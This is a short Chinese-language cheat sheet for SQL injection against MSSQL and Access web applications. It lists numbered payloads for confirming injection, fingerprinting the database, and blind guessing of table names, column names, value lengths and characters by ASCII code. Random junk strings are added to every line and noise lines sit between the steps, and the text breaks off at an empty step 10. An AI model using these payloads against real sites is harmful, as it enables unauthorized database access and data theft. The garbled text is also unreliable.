1.判断是否有注入;and 1=1 ;and 1=2 ~@itZ,d\
2.初步判断是否是mssql ;and user>0 Z;WqKIM#
z81I2?v[Jr
3.注入参数是字符'and [查询条件] and ''=' BtU,1`El5
r~t&;yRv
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 4XX21<yn
M7jDV|Go
5.判断数据库系统 R8":1 #&
c!w4N5aM
;and (select count(*) from sysobjects)>0 mssql :*}tkr4&eh
~a/yLI"'g
;and (select count(*) from msysobjects)>0 access !B-&I E?
='soSnT
AbcLHV.
J0o U5d=3
6.猜数据库 ;and (select Count(*) from [数据库名])>0 _ogT(uYyr
60X B
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ^+,mxV'8!
#i)h0ML/e
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 M{O2O(
5
0~L(<
9.(1)猜字段的ascii值(access) s2w.V
O
Ai#W.
n
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 e^Jy-?E
f"k/j?e*
(2)猜字段的ascii值(mssql) ^@{'! N
Nm\I_wjX
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 [DjdR_9*I
Jc{zi^)(EN
10.测试权限结构(mssql) b3Y9
z %mM#X
xA&